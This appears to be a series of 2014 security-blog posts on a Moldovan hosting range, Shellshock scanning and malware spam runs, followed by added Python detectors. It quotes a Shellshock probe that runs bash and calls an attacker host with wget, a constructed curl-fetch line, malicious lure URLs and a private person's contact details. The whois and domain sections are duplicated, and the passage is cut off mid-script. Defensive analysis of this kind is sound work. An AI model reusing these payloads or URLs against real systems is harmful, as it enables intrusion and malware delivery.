If you are planning to transfer your domain to another registrar, we would like to do whatever it takes to keep your business - please let us know how we can improve our service to you.
Presumably this is a way of doing whatever it takes. I did even drill down into the HTML source to make sure it wasn't my mail client screwing up. It seems that I'm not the only person who has had problems transferring their domain out, according to this story.
UPDATE 2014-10-03: I raised a ticket which was acknowledged... and then ignored completely. NetSol are breaking ICANN regulations by not providing the authorisation code in a timely manner.
UPDATE 2014-10-09: After several support tickets and chasing through Twitter I finally got the transfer code... after two weeks! This clearly breaches the specified five calendar days to do the job.
Just a (hopefully) final note. If you do find that a registrar is being deliberately obstructive about the transfer (or they transferred a domain without your permission) you can make a complaint to ICANN here.
Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24
I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server and attempting to wget back to their own network to enumerate vulnerable hosts.
inetnum: 83.166.234.0 - 83.166.234.255
netname: MangoHost-Net
descr: S.R.L. MangoHost Network
descr: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country: MD
org: ORG-SMN4-RIPE
admin-c: VL6476-RIPE
tech-c: VL6476-RIPE
status: ASSIGNED PA
mnt-by: RIM2000-MNT
notify: noc@rim2000.ru
changed: lukina@rim2000.ru 20140318
changed: lukina@rim2000.ru 20140325
source: RIPE
organisation: ORG-SMN4-RIPE
org-name: S.R.L. MangoHost Network
org-type: OTHER
address: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail: mangohostnetwork@gmail.com
abuse-c: AR18923-RIPE
abuse-mailbox: mangohostnetwork@gmail.com
mnt-ref: CLOUDATAMD-MNT
mnt-by: CLOUDATAMD-MNT
mnt-ref: RIM2000-MNT
changed: iuraqq@gmail.com 20140314
source: RIPE
person: Victor Letkovski
address: T. Vladimirescu str 1/1 2024 Chisinau
phone: +373 79 342393
nic-hdl: VL6476-RIPE
mnt-by: BSB-SERVICE-MNT
changed: ripe@plusserver.de 20130520
source: RIPE
% Information related to '83.166.234.0/24AS200019'
route: 83.166.234.0/24
descr: S.R.L. MangoHost Network
origin: AS200019
mnt-by: RIM2000-MNT
changed: lukina@rim2000.ru 20140319
source: RIPE
MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.
Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).
Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:
for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com
I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.
The probe that started all this looked like this in my Apache log:
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
ad.dipad.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133, which is what made me suspicious of the whole range (registered to MangoHost, as shown above).
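That log line is what a Shellshock scan looks like from the server side: the `() {` function-definition prologue lands in a request header (here the User-Agent, which Apache passes to CGI scripts as an environment variable) and carries a command that fetches a URL, so the attacker learns which hosts executed it. As an added example, not the blog's own code, the following parses combined-format log lines (with the optional vhost prefix seen above), flags that pattern in any header field, pulls out the callback URL and proposes the source /24 to block. The first sample line is the probe quoted above; the other two are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Apache combined format with the optional "vhost:port" prefix seen in the line above.
LOG_RE = re.compile(
    r'^(?:(?P<vhost>\S+:\d+)\s+)?'
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<request>(?:\\.|[^"\\])*)"\s+(?P<status>\d{3})\s+(?P<size>\S+)'
    r'(?:\s+"(?P<referer>(?:\\.|[^"\\])*)"\s+"(?P<agent>(?:\\.|[^"\\])*)")?'
)
# The bash function-definition prologue that triggers CVE-2014-6271: "() {" ... "};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# First URL handed to wget or curl inside the injected command.
CALLBACK_RE = re.compile(r"\b(?:wget|curl)\b.*?(https?://[^\s\"']+)")


def _unquote(field):
    """Undo Apache's backslash escaping inside a quoted log field."""
    return re.sub(r"\\(.)", r"\1", field) if field else field


def detect_shellshock(line):
    """Return a finding dict for a Shellshock probe, or None for a normal request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("request", "referer", "agent"):
        value = _unquote(m.group(field))
        if not value or not SHELLSHOCK_RE.search(value):
            continue
        cb = CALLBACK_RE.search(value)
        callback = cb.group(1) if cb else None
        return {
            "ip": m.group("ip"),
            "field": field,
            "payload": value,
            "callback": callback,
            "callback_host": urlsplit(callback).hostname if callback else None,
            # The post's advice is to block the whole range the probe came from.
            "block": str(ipaddress.ip_network(m.group("ip") + "/24", strict=False)),
        }
    return None


def scan_shellshock(lines):
    """All findings for an iterable of log lines, in input order."""
    return [f for f in (detect_shellshock(l) for l in lines) if f]


# First line is the probe quoted in the post; the other two are constructed
# (a curl variant carried in the Referer, and a normal browser request).
SAMPLE_LOG = [
    r'dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" '
    r'"() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""',
    r'203.0.113.9 - - [27/Sep/2014:04:10:00 +0100] "GET /cgi-bin/status HTTP/1.1" 404 209 '
    r'"() { :; }; /usr/bin/curl -s http://198.51.100.23/x.sh" "Mozilla/5.0"',
    r'198.51.100.5 - - [27/Sep/2014:05:00:00 +0100] "GET / HTTP/1.1" 200 11044 "-" '
    r'"Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for f in scan_shellshock(SAMPLE_LOG):
        print(f["ip"], f["field"], f["callback_host"], "-> block", f["block"])
```

The callback host is the second indicator to chase: here it resolves into the same /24 as the probing address, which is what turned one log line into a look at the whole range. This example does not resolve names (it would not run offline), so that comparison is left to you; also note that the probe can arrive in any header Apache exports to CGI (Cookie, Host, custom headers), so a complete detector should run the regex over the raw request headers, not only the three fields a combined log keeps.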
inetnum: 83.166.234.0 - 83.166.234.255
netname: MangoHost-Net
descr: S.R.L. MangoHost Network
descr: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country: MD
org: ORG-SMN4-RIPE
admin-c: VL6476-RIPE
tech-c: VL6476-RIPE
status: ASSIGNED PA
mnt-by: RIM2000-MNT
notify: noc@rim2000.ru
changed: lukina@rim2000.ru 20140318
changed: lukina@rim2000.ru 20140325
source: RIPE
organisation: ORG-SMN4-RIPE
org-name: S.R.L. MangoHost Network
org-type: OTHER
address: str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail: mangohostnetwork@gmail.com
abuse-c: AR18923-RIPE
abuse-mailbox: mangohostnetwork@gmail.com
mnt-ref: CLOUDATAMD-MNT
mnt-by: CLOUDATAMD-MNT
mnt-ref: RIM2000-MNT
changed: iuraqq@gmail.com 20140314
source: RIPE
person: Victor Letkovski
address: T. Vladimirescu str 1/1 2024 Chisinau
phone: +373 79 342393
nic-hdl: VL6476-RIPE
mnt-by: BSB-SERVICE-MNT
changed: ripe@plusserver.de 20130520
source: RIPE
% Information related to '83.166.234.0/24AS200019'
route: 83.166.234.0/24
descr: S.R.L. MangoHost Network
origin: AS200019
mnt-by: RIM2000-MNT
changed: lukina@rim2000.ru 20140319
source: RIPE
MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.
Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).
Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:
for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com
I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.
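As an added illustration (not code from the original post), here is a small Python triage script that applies the two checks this post makes by hand: it finds Shellshock-style "() {" probes in Apache access-log request, referer and User-Agent fields, pulls out the host the payload tries to fetch from, and flags any client that falls inside 83.166.234.0/24. The log lines are constructed; the first reproduces the probe quoted above, the other two are made up for contrast.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed Apache access-log lines. The first reproduces the probe quoted
# at the top of the post; the other two are made up for contrast.
SAMPLE_LOG = r'''dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
dynamoo.com:80 198.51.100.7 - - [27/Sep/2014:03:09:01 +0100] "GET /index.html HTTP/1.1" 200 11044 "-" "Mozilla/5.0 (compatible; ExampleBot/1.0)"
dynamoo.com:80 83.166.234.186 - - [27/Sep/2014:03:10:22 +0100] "GET /robots.txt HTTP/1.1" 200 120 "-" "curl/7.30.0"
'''

# The /24 the post recommends blocking.
BLOCKED_NET = ipaddress.ip_network("83.166.234.0/24")

# Apache "combined" format with an optional leading vhost:port field, as in the
# quoted line. The final quoted field is the User-Agent, which is where this
# probe carried its payload.
LOG_RE = re.compile(
    r'^(?:\S+:\d+\s+)?(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<request>[^"]*)"\s+(?P<status>\d{3})\s+(?P<size>\S+)\s+'
    r'"(?P<referer>[^"]*)"\s+"(?P<agent>.*)"$'
)

# Shellshock probes open with a bash function definition "() {" in a header
# that the server exports into the environment; whitespace varies by probe.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# URLs inside the payload: up to whitespace, a quote or a backslash (the inner
# quotes in the log are backslash-escaped).
URL_RE = re.compile(r'https?://[^\s"\\]+')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse_entry(entry):
    """Build a triage record for one parsed entry."""
    try:
        ip = ipaddress.ip_address(entry["ip"])
        in_block = ip in BLOCKED_NET
    except ValueError:          # HostnameLookups on, or a garbled field
        in_block = False
    haystack = " ".join((entry["request"], entry["referer"], entry["agent"]))
    probe = bool(SHELLSHOCK_RE.search(haystack))
    callbacks = []
    if probe:
        for url in URL_RE.findall(haystack):
            host = urlparse(url).hostname
            if host and host not in callbacks:
                callbacks.append(host)
    return {
        "ip": entry["ip"],
        "in_blocked_net": in_block,
        "shellshock_probe": probe,
        "callback_hosts": callbacks,
    }


def analyse_log(text):
    """Triage every parseable line of an access log, in order."""
    records = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry:
            records.append(analyse_entry(entry))
    return records


def addresses_to_block(records):
    """IPs worth blocking: probe sources plus anything already in the flagged /24."""
    return sorted({r["ip"] for r in records
                   if r["shellshock_probe"] or r["in_blocked_net"]})


if __name__ == "__main__":
    recs = analyse_log(SAMPLE_LOG)
    for rec in recs:
        print(rec)
    print("block:", addresses_to_block(recs))
```

Feed it a real access log by replacing SAMPLE_LOG with the file contents; the callback hosts it extracts are the ones to add to a DNS or proxy blocklist alongside the source addresses.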
Labels:
Evil Network,
Moldova,
Russia
Friday 26 September 2014
Malware spam: "HMRC taxes application with reference" / "Important - BT Digital File" / RBS "Outstanding invoice"
Another bunch of spam emails, with the same payload as this earlier spam run.
HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@taxreg.hmrc.gov.uk [noreply@taxreg.hmrc.gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here: http://motobrothers.com.pl/documents/document26092014-008.php
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.
Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@bt.com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link below : http://splash.com.my/documents/document26092014-008.php
If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 0346* between 8am and midnight.
Thank you for choosing BT Digital Vault.
Kind regards,
BT Digital Vault Team
footer
*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.
Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.
This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.
Registered office: 81 Newgate Street London EC1A 7AJ Registered in England no: 1800000
RBS Bankline: Outstanding invoice
From: Bankline.Administrator@rbs.co.uk [Bankline.Administrator@rbs.co.uk]
To: redacted.uk
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here
I would be grateful if you could look into this matter and advise on an expected payment date .
Many thanks
Paul Hamilton
Credit Control
Tel: 0845 300 2952
In the sample I looked at, the malware page downloaded an archive document26092014-008_pdf.zip, which in turn contains document26092014-008_pdf.exe, the same payload as earlier.
The links I have seen so far in the emails are:
http://motobrothers.com.pl/documents/document26092014-008.php
http://splash.com.my/documents/document26092014-008.php
http://www.firstlcoc.org/documents/document26092014-008.php
http://elblogderosner.com/documents/document26092014-008.php
Malware spam: "Employee Documents - Internal Use" / "You have a new voice" / "BACS Transfer : Remittance for JSAG244GBP" / "New Fax"
Whoever is running this spam run is evolving it day after day, using different types of spam to increase clickthrough rates, and now some tricks to hinder analysis of the malware.
Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents
DOCUMENT LINK: http://iqmaintenance.com.au/Documents/document26092014-20.pdf
Documents are encrypted in transit and store in a secure repository
---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential. If you received this transmission in error, please notify the sender by reply email and delete the message and any attachments.
You have a new voice
From: Voice Mail [Voice.Mail@victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link below: http://www.sjorg.com/Documents/voice26092014-18
The link to this secure message will expire in 24 hours. If you would like to save a copy of the email or attachment, please save from the opened encrypted email. If an attachment is included, you will be given the option to download a copy of the attachment to your computer.
RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@rbs.co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link below:
http://plugdeals.com/Documents/payment26092014-15
New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here : http://montfort.dk/Documents/faxmessage26092014-16
The links in the emails I have seen go to the following locations (there are probably many, many more):
http://plugdeals.com/Documents/payment26092014-15
http://iqmaintenance.com.au/Documents/document26092014-20.pdf
http://www.sjorg.com/Documents/voice26092014-18
http://montfort.dk/Documents/faxmessage26092014-16
The attack has evolved recently. Until now these malicious links forwarded on to another site which hosted the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload has been spread around many different sites, making it harder to block.
New today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given AV engines one less hook to find.
The landing page script looks like this [pastebin], which is a bit harder to deal with, but nonetheless a malicious binary document7698124-86421_pdf.scr is downloaded from the remote site; it has a VirusTotal detection rate of 2/55. The Anubis report shows the malware attempting to phone home to padav.com, which is probably worth blocking.
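The point about the ZIP wrapper being the hook that AV engines catch suggests a gateway check that looks inside the download rather than only at the outer file. The following Python is an added example, not the author's tooling: it quarantines a download if it is an executable (.exe, .scr and friends), if its name carries a document-type decoy such as _pdf just before the real extension, if it carries a PE header under a non-executable name, or if it is an archive holding any such member. The sample files are constructed in memory (a two-byte MZ stub stands in for a real binary); the filenames reuse the ones reported in this run and in the 26 September HMRC/BT/RBS run above.

```python
import io
import zipfile

# Extensions Windows executes directly; a .scr is just a renamed .exe.
EXECUTABLE_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")
# Document types used as a decoy "inner extension", e.g. invoice_pdf.scr.
DECOY_INFIXES = ("pdf", "doc", "docx", "xls", "xlsx")
# First two bytes of every PE (and DOS) executable.
MZ_MAGIC = b"MZ"


def is_executable_name(name):
    return name.lower().endswith(EXECUTABLE_EXTS)


def has_decoy_infix(name):
    """True when the word just before the real extension is a document type,
    as in document26092014-008_pdf.exe; the separators _ - . are treated alike."""
    base = name.lower().rsplit("/", 1)[-1]
    stem = base.rsplit(".", 1)[0] if "." in base else base
    for sep in ("_", "-", "."):
        stem = stem.replace(sep, " ")
    parts = stem.split()
    return bool(parts) and parts[-1] in DECOY_INFIXES


def _check_name_and_head(name, head, where):
    """Checks shared by a top-level download and an archive member."""
    reasons = []
    if is_executable_name(name):
        reasons.append(f"executable {where}: {name}")
        if has_decoy_infix(name):
            reasons.append(f"document-type decoy in name {where}: {name}")
    elif head.startswith(MZ_MAGIC):
        reasons.append(f"PE header under non-executable name {where}: {name}")
    return reasons


def triage_download(filename, data):
    """Return the reasons to quarantine a download; an empty list means none found."""
    reasons = _check_name_and_head(filename, data[:2], "download")
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                try:
                    with zf.open(info) as member:
                        head = member.read(2)
                except RuntimeError:
                    head = b""   # password-protected member: the name check still applies
                reasons.extend(_check_name_and_head(info.filename, head, "inside archive"))
    return reasons


def build_sample_zip(member_name, content):
    """Constructed test fixture: an in-memory ZIP holding a single member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, content)
    return buf.getvalue()


# Constructed stand-in for a Windows binary: the MZ magic plus padding.
FAKE_PE = MZ_MAGIC + b"\x90" * 62


if __name__ == "__main__":
    samples = [
        ("document26092014-008_pdf.zip", build_sample_zip("document26092014-008_pdf.exe", FAKE_PE)),
        ("document7698124-86421_pdf.scr", FAKE_PE),
        ("report.pdf", b"%PDF-1.4 constructed benign document"),
        ("notes.zip", build_sample_zip("notes.txt", b"nothing to see here")),
    ]
    for name, blob in samples:
        print(name, "->", triage_download(name, blob) or "clean")
```

The name checks deliberately run even when a member cannot be read (an encrypted archive), since the filename alone, as with SecureMessage.scr or VoiceMail.scr in the runs below, is reason enough to hold the download.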
Thursday 25 September 2014
Malware spam: RBS "BACS Transfer" / Sage "Outdated Invoice" / Lloyds "Important - Commercial Documents" / NatWest "Important - New account invoice"
There seems to be a very aggressive spam run this morning, with at least four different email formats pushing the same malicious download.
RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@rbs.co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link below:
http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@sage.com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
https://invoice.sage.co.uk/Account?928143=Invoice_092514.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.
We have communicated this information with users as well, and we will continue to communicate with you through email as your transition continues.
This email was sent to: [redacted]
This email was sent by: Sage UK Limited
NC1-002-08-25, Newcastle upon Tyne., North Park, NE13 9AA, United Kingdom
Privacy and Security
Keeping your financial information secure is one of our most important responsibilities. For an explanation of how we manage customer information, please read our Privacy Policy. You can also learn how Sage UK Limited keeps your personal information secure and how you can help protect yourself.
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@lloydsbank.com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file)
----------------------
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
-----------------------
Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .
Yours faithfully
James Vance
Senior Manager, Lloyds Commercial Banking
Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.
Please remember we guarantee the security of messages sent by email.
NatWest Invoice: "Important - New account invoice"
From: NatWest Invoice [invoice@natwest.com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below :
https://www.nwolb.com/ServiceManagement/ InvoicePageNoMenu.aspx? InvoiceCode=Invoice_232449
Thank you for choosing NatWest.
Important: Please do not respond to this message. It comes from an unattended mailbox.
This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.
The Royal Bank of Scotland International Limited trading as NatWest (NatWest). Registered Office: P.O. Box 64, Royal Bank House, 71 Bath Street, St. Helier, Jersey JE4 8PJ. Regulated by the Jersey Financial Services Commission.
The links in the emails go to different download locations to make it harder to block:
http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
http://convergika.com/atlbhffykf/rdtlixjoot.html
http://calastargate.net/iqfhtfqinv/ybzhlpbjkh.html
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
There are probably many, many more locations. In each case the page then prompts the victim to download the file Invoice_09252014.zip from the same directory as the HTML file.
This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54. The Anubis report shows that it phones home to ukrchina-logistics.com, which is probably worth blocking or monitoring access to.
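The landing pages in this run (and in the Bankline, "Employee Documents" and "VoiceMail" runs reported below) share a shape: a directory of ten lowercase letters, an .html name of ten lowercase letters, and the archive fetched from that same directory. As an added example rather than anything from the original post, this Python correlates proxy-log entries per client: a landing-page hit alone is a medium-severity alert, and a following archive fetch from the same host and directory by the same client is raised to high. The log format and lines are constructed; the URLs reuse the ones quoted above plus a benign pair on www.example.org that must not match.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed proxy log: "<timestamp> <client ip> <url>" per line. The malicious
# URLs are the landing pages quoted in the post plus the archive name it reports;
# the www.example.org pair is a benign control with a 9-letter directory.
SAMPLE_PROXY_LOG = """\
2014-09-25T10:59:02 10.0.0.15 http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
2014-09-25T10:59:03 10.0.0.15 http://shetabweb.com/bvqsyphiwq/Invoice_09252014.zip
2014-09-25T11:02:10 10.0.0.22 http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
2014-09-25T11:05:44 10.0.0.31 http://www.example.org/downloads/report.html
2014-09-25T11:05:45 10.0.0.31 http://www.example.org/downloads/report.zip
"""

# Landing page: /<10 lowercase letters>/<10 lowercase letters>.html
LANDING_RE = re.compile(r'^/(?P<dir>[a-z]{10})/[a-z]{10}\.html$')
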